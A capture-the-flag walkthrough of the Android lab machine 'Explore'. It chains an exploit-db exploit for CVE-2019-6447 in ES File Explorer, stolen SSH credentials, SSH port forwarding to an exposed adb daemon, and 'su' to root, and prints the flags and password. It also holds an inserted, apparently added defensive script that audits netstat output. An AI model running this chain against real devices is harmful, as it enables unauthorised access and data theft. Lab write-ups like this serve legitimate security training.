Enumeration
As usual, let's start with nmap:
nmap -sV -Pn -p- 10.10.10.247
I googled the following:
port 5555 android --> adb (android debug bridge)
port 5977 android --> found out there is an Android vulnerability in ES File Explorer, CVE-2019-6447. Basically this vulnerability allows attackers on the same network to execute applications and read files on the Android device!
From your attacker machine do the following:
Go to exploit database https://www.exploit-db.com/
Click on Search EDB
and type 2019-6447 in the CVE field
Click on the exploit
Download the exploit
Go to your Downloads folder:
cd Downloads
ls
Let's try to run this exploit using:
python3 50070.py
Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the Android device, so let's try that:
python3 50070.py listPics 10.10.10.247
Looks like there is an interesting picture called creds.jpg
Let's try to get this file using getFile:
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
The file has been downloaded to our machine as out.dat; let's check it out:
When we open the file we see the following:
Looks like a password for username kristi:
Kr1sT!5h@Rp3xPl0r3!
We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:
ssh kristi@10.10.10.247 -p 2222
Type yes and press Enter
Enter the password we just found:
Kr1sT!5h@Rp3xPl0r3!
We are in!
id
ls
cd sdcard
ls
cat user.txt
f32017174c7c7e8f50c6da52891ae250
Congratulations! You got the user flag!
cd ..
ls
Let's find out which ports the Android device is listening on by typing:
netstat -tulpn | grep LISTEN
We can see port 5555 is listening.
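The netstat step above is the one a defender would automate: parse the listening sockets and flag anything on a port that hands out a shell. The following is an added example, not code from the original write-up; the netstat lines it parses are constructed, not captured from the target, and the port/service table is assumed from what this page found (adb on 5555, ssh on 2222).

```python
"""Audit `netstat -tulpn | grep LISTEN` output for an exposed ADB daemon."""
import re
import sys
from dataclasses import dataclass

# Ports this walkthrough relies on (assumed table). 5555 is adbd, which hands a
# shell (and via `su`, root) to anyone who can reach it, so it is the one to flag.
KNOWN_PORTS = {5555: "adb (Android Debug Bridge)", 2222: "ssh"}

# One line of `netstat -tulpn`: TCP lines carry a LISTEN state column,
# UDP lines do not, hence the optional group before the program name.
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+"
    r"(?:LISTEN\s+)?(?P<prog>\S+)\s*$"
)

@dataclass
class Listener:
    proto: str
    addr: str
    port: int
    program: str

    @property
    def exposed(self) -> bool:
        """True when bound to every interface rather than loopback only."""
        return self.addr in ("0.0.0.0", "::", "*")

def parse_netstat(text: str) -> list[Listener]:
    listeners = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header line or anything we do not understand
        addr, _, port = m.group("local").rpartition(":")  # handles ':::5555' too
        listeners.append(Listener(m.group("proto"), addr, int(port), m.group("prog")))
    return listeners

def audit(text: str) -> list[str]:
    """Return one finding per listener on a known port, with its bind scope."""
    findings = []
    for l in parse_netstat(text):
        if l.port in KNOWN_PORTS:
            scope = "ALL interfaces" if l.exposed else f"{l.addr} only"
            findings.append(f"{KNOWN_PORTS[l.port]} on {l.proto}/{l.port} ({l.program}) bound to {scope}")
    return findings

# Constructed sample output, not captured from the real machine.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN      1234/sshd
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      567/adbd
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN      890/adb
"""

if __name__ == "__main__":
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for finding in audit(data):
        print(finding)
```

Save real output with `netstat -tulpn > netstat.txt` on the device and pass the file as the first argument; with no argument it runs on the constructed sample.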
Port forwarding
What is local port forwarding?
Local port forwarding is configured using the -L option:
ssh -L 5555:machine2:5555 machine1
This opens an SSH connection to machine1 and listens on port 5555 on your own machine; any connection to that local port is forwarded through machine1 to port 5555 on machine2.
For our case let's use it and type:
ssh -L 5555:localhost:5555 kristi@IP -p 2222
This opens an SSH connection to the HTB target machine (Explore) and listens on port 5555 on my localhost (VM); any connection to that local port is forwarded through the SSH session to port 5555 on the target.
We know that our target (HTB machine) is listening on port 5555 (netstat told us).
Open a new command prompt on your VM
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Enter the password we found earlier
Kr1sT!5h@Rp3xPl0r3!
adb
ADB - Android Debug Bridge is a command line tool that allows you to communicate with an Android device. It is used mainly by developers to install or debug apps, and it also comes with a Unix shell that can be used to run commands on the device.
An Android device emulator is just a virtual device that runs on your computer and allows you to develop and test your Android app without using a physical Android device.
Open a new command prompt on your VM
sudo apt install adb
Press Y to continue
sudo apt-get update
sudo apt install adb
Press Y to continue.
This time it worked; we have installed adb successfully.
adb devices
adb connect localhost:5555
adb devices
adb shell
adb localhost shell
adb -s localhost shell
whoami
su
The su command switches to the superuser, i.e. the root user.
whoami
We are now root!
ls
cd data
ls
cat root.txt
f04fc82b6d49b41c9b08982be59338c5
Congratulations! You got the root flag!